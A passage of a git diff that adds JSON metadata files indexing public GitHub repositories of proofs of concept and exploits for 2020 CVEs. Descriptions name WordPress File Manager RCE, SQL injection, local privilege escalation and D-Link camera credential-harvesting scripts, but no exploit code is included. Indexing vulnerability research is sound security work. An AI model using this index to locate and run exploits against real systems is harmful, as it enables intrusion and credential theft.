0000000000..e82ecff27e --- /dev/null +++ b/2020/CVE-2020-24490.json @@ -0,0 +1,64 @@ +[ + { + "id": 793402660, + "name": "linux_CVE-2020-24490-beforePatch", + "full_name": "AbrarKhan\/linux_CVE-2020-24490-beforePatch", + "owner": { + "login": "AbrarKhan", + "id": 3054615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054615?v=4", + "html_url": "https:\/\/github.com\/AbrarKhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbrarKhan\/linux_CVE-2020-24490-beforePatch", + "description": null, + "fork": false, + "created_at": "2024-04-29T06:47:40Z", + "updated_at": "2024-04-29T06:53:24Z", + "pushed_at": "2024-04-29T06:53:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 793474421, + "name": "Linux-4.19.72_CVE-2020-24490", + "full_name": "AbrarKhan\/Linux-4.19.72_CVE-2020-24490", + "owner": { + "login": "AbrarKhan", + "id": 3054615, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3054615?v=4", + "html_url": "https:\/\/github.com\/AbrarKhan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AbrarKhan\/Linux-4.19.72_CVE-2020-24490", + "description": null, + "fork": false, + "created_at": "2024-04-29T09:39:42Z", + "updated_at": "2024-04-29T12:29:16Z", + "pushed_at": "2024-04-29T12:29:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24572.json b/2020/CVE-2020-24572.json new file mode 100644 index 0000000000..afa2e71d04 --- /dev/null +++ b/2020/CVE-2020-24572.json @@ -0,0 +1,64 @@ +[ + { + "id": 289633451, + "name": "cve-2020-24572", + "full_name": "lb0x\/cve-2020-24572", + "owner": { + "login": "lb0x", + "id": 336581, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/336581?v=4", + "html_url": "https:\/\/github.com\/lb0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lb0x\/cve-2020-24572", + "description": null, + "fork": false, + "created_at": "2020-08-23T06:58:04Z", + "updated_at": "2023-07-24T05:58:19Z", + "pushed_at": "2021-03-02T20:28:50Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 353538057, + "name": "CVE-2020-24572-POC", + "full_name": "gerbsec\/CVE-2020-24572-POC", + "owner": { + "login": "gerbsec", + "id": 67713732, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67713732?v=4", + "html_url": "https:\/\/github.com\/gerbsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gerbsec\/CVE-2020-24572-POC", + "description": "An issue was discovered in includes\/webconsole.php in RaspAP 2.5. With authenticated access, an attacker can use a misconfigured (and virtually unrestricted) web console to attack the underlying OS running this software, and execute commands on the system including ones for uploading of files and execution of code.", + "fork": false, + "created_at": "2021-04-01T01:33:26Z", + "updated_at": "2024-07-17T22:52:43Z", + "pushed_at": "2021-04-01T01:35:35Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24597.json b/2020/CVE-2020-24597.json new file mode 100644 index 0000000000..a1e9d0e7ce --- /dev/null +++ b/2020/CVE-2020-24597.json @@ -0,0 +1,33 @@ +[ + { + "id": 290375222, + "name": "CVE-2020-24597", + "full_name": "HoangKien1020\/CVE-2020-24597", + "owner": { + "login": "HoangKien1020", + "id": 24661746, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24661746?v=4", + "html_url": "https:\/\/github.com\/HoangKien1020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HoangKien1020\/CVE-2020-24597", + "description": "Directory traversal in com_media to RCE", + "fork": false, + "created_at": "2020-08-26T02:31:21Z", + "updated_at": "2024-08-12T20:05:08Z", + "pushed_at": "2021-03-03T03:46:43Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24616.json b/2020/CVE-2020-24616.json new file mode 100644 index 0000000000..3fc77570bd --- /dev/null +++ b/2020/CVE-2020-24616.json @@ -0,0 +1,33 @@ +[ + { + "id": 292535943, + "name": "cve-2020-24616-poc", + "full_name": "0xkami\/cve-2020-24616-poc", + "owner": { + "login": "0xkami", + "id": 19571618, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/19571618?v=4", + "html_url": "https:\/\/github.com\/0xkami", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xkami\/cve-2020-24616-poc", + "description": "cve-2020-24616 poc", + "fork": false, + "created_at": "2020-09-03T10:18:39Z", + "updated_at": "2021-10-29T09:01:23Z", + "pushed_at": "2020-09-07T06:22:50Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24656.json b/2020/CVE-2020-24656.json new file mode 100644 index 0000000000..4dfd39731b --- /dev/null +++ b/2020/CVE-2020-24656.json @@ -0,0 +1,33 @@ +[ + { + "id": 406340554, + "name": "Internet-Security-Project", + "full_name": "terzinodipaese\/Internet-Security-Project", + "owner": { + "login": "terzinodipaese", + "id": 30941518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30941518?v=4", + "html_url": "https:\/\/github.com\/terzinodipaese", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/terzinodipaese\/Internet-Security-Project", + "description": "Here you can find my relation about the project I made for the Internet Security course. Because I written it in Latex, you can also find the Latex source files. The project talks about Maltego vulnerability CVE-2020-24656, which allows an attacker to exfiltrate data via an XXE injection attack.", + "fork": false, + "created_at": "2021-09-14T11:33:12Z", + "updated_at": "2021-09-14T11:38:50Z", + "pushed_at": "2021-09-14T11:38:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24750.json b/2020/CVE-2020-24750.json new file mode 100644 index 0000000000..a7a1b4c140 --- /dev/null +++ b/2020/CVE-2020-24750.json @@ -0,0 +1,35 @@ +[ + { + "id": 267329968, + "name": "CVE-2020-24750", + "full_name": "Al1ex\/CVE-2020-24750", + "owner": { + "login": "Al1ex", + "id": 38161463, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2020-24750", + "description": "CVE-2020-24750", + "fork": false, + "created_at": "2020-05-27T13:42:11Z", + "updated_at": "2024-08-12T20:01:58Z", + "pushed_at": "2022-11-16T09:25:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-24750" + ], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24765.json b/2020/CVE-2020-24765.json new file mode 100644 index 0000000000..006a84f8e2 --- /dev/null +++ b/2020/CVE-2020-24765.json @@ -0,0 +1,33 @@ +[ + { + "id": 719946774, + "name": "CVE-2020-24765", + "full_name": "fbkcs\/CVE-2020-24765", + "owner": { + "login": "fbkcs", + "id": 44971422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44971422?v=4", + "html_url": "https:\/\/github.com\/fbkcs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fbkcs\/CVE-2020-24765", + "description": "Authentication Bypass Vulnerability in Mind Server.", + "fork": false, + "created_at": "2023-11-17T08:43:14Z", + "updated_at": "2023-11-17T08:43:14Z", + "pushed_at": "2023-11-17T08:46:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24815.json b/2020/CVE-2020-24815.json new file mode 100644 index 0000000000..1ed25d1b48 --- /dev/null +++ b/2020/CVE-2020-24815.json @@ -0,0 +1,33 @@ +[ + { + "id": 615854510, + "name": "exploit-CVE-2020-24815", + "full_name": "darkvirus-7x\/exploit-CVE-2020-24815", + "owner": { + "login": "darkvirus-7x", + "id": 111196316, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111196316?v=4", + "html_url": "https:\/\/github.com\/darkvirus-7x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darkvirus-7x\/exploit-CVE-2020-24815", + "description": null, + "fork": false, + "created_at": "2023-03-18T21:42:29Z", + "updated_at": "2023-09-21T16:31:38Z", + "pushed_at": "2023-03-30T13:54:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24881.json b/2020/CVE-2020-24881.json new file mode 100644 index 0000000000..ac97172233 --- /dev/null +++ b/2020/CVE-2020-24881.json @@ -0,0 +1,33 @@ +[ + { + "id": 887139437, + "name": "cve-2020-24881", + "full_name": "harshtech123\/cve-2020-24881", + "owner": { + "login": "harshtech123", + "id": 139060630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/139060630?v=4", + "html_url": "https:\/\/github.com\/harshtech123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/harshtech123\/cve-2020-24881", + "description": null, + "fork": false, + "created_at": "2024-11-12T08:32:19Z", + "updated_at": "2024-11-13T11:34:13Z", + "pushed_at": "2024-11-13T11:34:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24913.json b/2020/CVE-2020-24913.json new file mode 100644 index 0000000000..ba1aec0659 --- /dev/null +++ b/2020/CVE-2020-24913.json @@ -0,0 +1,33 @@ +[ + { + "id": 803451949, + "name": "CVE-2020-24913-PoC", + "full_name": "agarma\/CVE-2020-24913-PoC", + "owner": { + "login": "agarma", + "id": 170352821, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/170352821?v=4", + "html_url": "https:\/\/github.com\/agarma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/agarma\/CVE-2020-24913-PoC", + "description": "A Poc for CVE-2020-24913, a SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request.", + "fork": false, + "created_at": "2024-05-20T18:45:50Z", + "updated_at": "2024-05-20T19:20:55Z", + "pushed_at": "2024-05-20T19:20:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24949.json b/2020/CVE-2020-24949.json new file mode 100644 index 0000000000..3219d6b207 --- /dev/null +++ b/2020/CVE-2020-24949.json @@ -0,0 +1,33 @@ +[ + { + "id": 373457880, + "name": "CVE-2020-24949", + "full_name": "r90tpass\/CVE-2020-24949", + "owner": { + "login": "r90tpass", + "id": 82740056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82740056?v=4", + "html_url": "https:\/\/github.com\/r90tpass", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r90tpass\/CVE-2020-24949", + "description": "PHPFusion 9.03.50 - Remote Code Execution", + "fork": false, + "created_at": "2021-06-03T09:49:22Z", + "updated_at": "2021-06-03T09:50:31Z", + "pushed_at": "2021-06-03T09:50:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24955.json b/2020/CVE-2020-24955.json new file mode 100644 index 0000000000..4683fe8a99 --- /dev/null +++ b/2020/CVE-2020-24955.json @@ -0,0 +1,33 @@ +[ + { + "id": 292162147, + "name": "CVE-2020-24955", + "full_name": "nmht3t\/CVE-2020-24955", + "owner": { + "login": "nmht3t", + "id": 68638314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68638314?v=4", + "html_url": "https:\/\/github.com\/nmht3t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nmht3t\/CVE-2020-24955", + "description": "SUPERAntiSyware Professional X Trial <= 10.0.1206 Local Privilege Escalation", + "fork": false, + "created_at": "2020-09-02T02:48:36Z", + "updated_at": "2020-09-02T03:01:10Z", + "pushed_at": "2020-09-02T03:00:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-24972.json b/2020/CVE-2020-24972.json new file mode 100644 index 0000000000..f907137b96 --- /dev/null +++ b/2020/CVE-2020-24972.json @@ -0,0 +1,33 @@ +[ + { + "id": 850674642, + "name": "CVE-2020-24972", + "full_name": "SpiralBL0CK\/CVE-2020-24972", + "owner": { + "login": "SpiralBL0CK", + "id": 25670930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25670930?v=4", + "html_url": "https:\/\/github.com\/SpiralBL0CK", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SpiralBL0CK\/CVE-2020-24972", + "description": "PoC for CVE-2020-24972", + "fork": false, + "created_at": "2024-09-01T13:13:58Z", + "updated_at": "2024-09-03T22:08:07Z", + "pushed_at": "2024-09-03T20:53:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2501.json b/2020/CVE-2020-2501.json new file mode 100644 index 0000000000..8368257bed --- /dev/null +++ b/2020/CVE-2020-2501.json @@ -0,0 +1,33 @@ +[ + { + "id": 462035961, + "name": "alonzzzo", + "full_name": "Alonzozzz\/alonzzzo", + "owner": { + "login": "Alonzozzz", + "id": 100165245, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100165245?v=4", + "html_url": "https:\/\/github.com\/Alonzozzz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alonzozzz\/alonzzzo", + "description": "Changelog CVE-2021-33044,CVE-2021-33045 Identity authentication bypass vulnerability found in some Dahua products CVE-2021-27248,CVE-2021-27249,CVE-2021-27250,CVE-2021-34860,CVE-2021-34861,CVE-2021-34862,CVE-2021-34863 Multiple vulnerabilities in DAP-2020 H\/W rev. Ax with F\/W v1.01 and below HTTP Path Traversal CVE-2019-7406 RCE vulnerability in TP-Link Wi-Fi Extenders via a malformed user agent field in HTTP headers CVE-2020-2501,CVE-2021-28797 Stack Buffer Overflow in QNAP Surveillance Station CVE-2021-34730 Critical UPnP Service Flaw on Cisco Small Business RV Series Routers CVE-2020-35785 Multiple HTTP authentication vulnerabilities on DGN2200v1", + "fork": false, + "created_at": "2022-02-21T21:22:43Z", + "updated_at": "2022-02-21T21:22:43Z", + "pushed_at": "2022-02-21T21:23:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25068.json b/2020/CVE-2020-25068.json new file mode 100644 index 0000000000..0b6202ac22 --- /dev/null +++ b/2020/CVE-2020-25068.json @@ -0,0 +1,33 @@ +[ + { + "id": 292313004, + "name": "CVE-2020-25068", + "full_name": "bryanroma\/CVE-2020-25068", + "owner": { + "login": "bryanroma", + "id": 16670696, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16670696?v=4", + "html_url": "https:\/\/github.com\/bryanroma", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bryanroma\/CVE-2020-25068", + "description": "Python script to exploit CVE-2020-25068. ", + "fork": false, + "created_at": "2020-09-02T14:53:57Z", + "updated_at": "2020-09-10T06:05:05Z", + "pushed_at": "2020-09-03T13:28:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25078.json b/2020/CVE-2020-25078.json new file mode 100644 index 0000000000..a6fe8fa507 --- /dev/null +++ b/2020/CVE-2020-25078.json @@ -0,0 +1,64 @@ +[ + { + "id": 352901213, + "name": "CVE-2020-25078", + "full_name": "MzzdToT\/CVE-2020-25078", + "owner": { + "login": "MzzdToT", + "id": 44486276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44486276?v=4", + "html_url": "https:\/\/github.com\/MzzdToT", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MzzdToT\/CVE-2020-25078", + "description": "D-Link DCS系列账号密码信息泄露漏洞,通过脚本获取账号密码,可批量。", + "fork": false, + "created_at": "2021-03-30T06:57:31Z", + "updated_at": "2024-08-12T20:11:40Z", + "pushed_at": "2021-03-30T07:10:34Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 417501861, + "name": "CVE-2020-25078", + "full_name": "chinaYozz\/CVE-2020-25078", + "owner": { + "login": "chinaYozz", + "id": 65993068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65993068?v=4", + "html_url": "https:\/\/github.com\/chinaYozz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chinaYozz\/CVE-2020-25078", + "description": "CVE-2020-25078账号密码信息泄露批量脚本Batch script of D-Link DCS series camera account password information disclosure", + "fork": false, + "created_at": "2021-10-15T13:03:29Z", + "updated_at": "2024-03-12T15:35:10Z", + "pushed_at": "2021-10-15T13:40:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-2509.json b/2020/CVE-2020-2509.json new file mode 100644 index 0000000000..5df309375e --- /dev/null +++ b/2020/CVE-2020-2509.json @@ -0,0 +1,38 @@ +[ + { + "id": 518595183, + "name": "overkill", + "full_name": "jbaines-r7\/overkill", + "owner": { + "login": "jbaines-r7", + "id": 91965877, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4", + "html_url": "https:\/\/github.com\/jbaines-r7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jbaines-r7\/overkill", + "description": "QNAP N-Day (Probably not CVE-2020-2509)", + "fork": false, + "created_at": "2022-07-27T19:58:40Z", + "updated_at": "2024-08-12T20:25:34Z", + "pushed_at": "2022-07-27T20:53:38Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-2509", + "exploit", + "poc", + "qnap" + ], + "visibility": "public", + "forks": 10, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25134.json b/2020/CVE-2020-25134.json new file mode 100644 index 0000000000..ee8bb3f639 --- /dev/null +++ b/2020/CVE-2020-25134.json @@ -0,0 +1,33 @@ +[ + { + "id": 385486999, + "name": "CVE-2020-25134", + "full_name": "ynsmroztas\/CVE-2020-25134", + "owner": { + "login": "ynsmroztas", + "id": 58443521, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58443521?v=4", + "html_url": "https:\/\/github.com\/ynsmroztas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ynsmroztas\/CVE-2020-25134", + "description": "CVE-2020-25134 Authenticated Local File Inclusion in settings\/format", + "fork": false, + "created_at": "2021-07-13T05:29:30Z", + "updated_at": "2021-07-13T05:32:37Z", + "pushed_at": "2021-07-13T05:32:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25200.json b/2020/CVE-2020-25200.json new file mode 100644 index 0000000000..24725a9d5f --- /dev/null +++ b/2020/CVE-2020-25200.json @@ -0,0 +1,33 @@ +[ + { + "id": 293369835, + "name": "pritunl-CVE-2020-25200", + "full_name": "lukaszstu\/pritunl-CVE-2020-25200", + "owner": { + "login": "lukaszstu", + "id": 70864053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70864053?v=4", + "html_url": "https:\/\/github.com\/lukaszstu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lukaszstu\/pritunl-CVE-2020-25200", + "description": "pritunl-CVE-2020-25200", + "fork": false, + "created_at": "2020-09-06T22:11:24Z", + "updated_at": "2023-04-29T15:00:37Z", + "pushed_at": "2020-09-08T05:48:48Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-25213.json b/2020/CVE-2020-25213.json new file mode 100644 index 0000000000..f9ca74dd68 --- /dev/null +++ b/2020/CVE-2020-25213.json @@ -0,0 +1,285 @@ +[ + { + "id": 302958732, + "name": "wp-file-manager-CVE-2020-25213", + "full_name": "mansoorr123\/wp-file-manager-CVE-2020-25213", + "owner": { + "login": "mansoorr123", + "id": 54185552, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54185552?v=4", + "html_url": "https:\/\/github.com\/mansoorr123", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mansoorr123\/wp-file-manager-CVE-2020-25213", + "description": "https:\/\/medium.com\/@mansoorr\/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8", + "fork": false, + "created_at": "2020-10-10T17:50:01Z", + "updated_at": "2024-10-01T05:06:09Z", + "pushed_at": "2020-10-12T09:57:28Z", + "stargazers_count": 57, + "watchers_count": 57, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty", + "infosec", + "zeroday" + ], + "visibility": "public", + "forks": 24, + "watchers": 57, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 312602621, + "name": "WPKiller", + "full_name": "kakamband\/WPKiller", + "owner": { + "login": "kakamband", + "id": 70383870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70383870?v=4", + "html_url": "https:\/\/github.com\/kakamband", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kakamband\/WPKiller", + "description": "CVE-2020-25213 Wordpress File Manager 6.7 Plugin 0day exploit", + "fork": false, + "created_at": "2020-11-13T14:47:27Z", + "updated_at": "2024-08-12T20:07:36Z", + "pushed_at": "2020-11-13T14:46:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 335841666, + "name": "CVE-2020-25213-Wordpress", + "full_name": "forse01\/CVE-2020-25213-Wordpress", + "owner": { + "login": "forse01", + "id": 76189258, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76189258?v=4", + "html_url": "https:\/\/github.com\/forse01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/forse01\/CVE-2020-25213-Wordpress", + "description": null, + "fork": false, + "created_at": "2021-02-04T04:52:06Z", + "updated_at": "2023-03-16T01:13:50Z", + "pushed_at": "2021-03-05T02:31:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 347219302, + "name": "Wordpress-CVE-2020-25213", + "full_name": "0000000O0Oo\/Wordpress-CVE-2020-25213", + "owner": { + "login": "0000000O0Oo", + "id": 61102077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61102077?v=4", + "html_url": "https:\/\/github.com\/0000000O0Oo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0000000O0Oo\/Wordpress-CVE-2020-25213", + "description": "Will write a python script for exploiting this vulnerability ", + "fork": false, + "created_at": "2021-03-12T22:58:43Z", + "updated_at": "2021-03-13T13:15:06Z", + "pushed_at": "2021-03-13T13:15:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 354304279, + "name": "CVE-2020-25213", + "full_name": "piruprohacking\/CVE-2020-25213", + "owner": { + "login": "piruprohacking", + "id": 81864674, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81864674?v=4", + "html_url": "https:\/\/github.com\/piruprohacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/piruprohacking\/CVE-2020-25213", + "description": null, + "fork": false, + "created_at": "2021-04-03T13:52:21Z", + "updated_at": "2021-04-03T13:53:06Z", + "pushed_at": "2021-04-03T13:53:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 495906064, + "name": "CVE-2020-25213", + "full_name": "b1ackros337\/CVE-2020-25213", + "owner": { + "login": "b1ackros337", + "id": 106174449, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106174449?v=4", + "html_url": "https:\/\/github.com\/b1ackros337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1ackros337\/CVE-2020-25213", + "description": null, + "fork": false, + "created_at": "2022-05-24T16:35:23Z", + "updated_at": "2022-07-09T13:27:09Z", + "pushed_at": "2022-07-09T13:47:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 592012076, + "name": "Python-exploit-CVE-2020-25213", + "full_name": "BLY-Coder\/Python-exploit-CVE-2020-25213", + "owner": { + "login": "BLY-Coder", + "id": 63339164, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63339164?v=4", + "html_url": "https:\/\/github.com\/BLY-Coder", + "user_view_type": "public" + }, + "html_url": 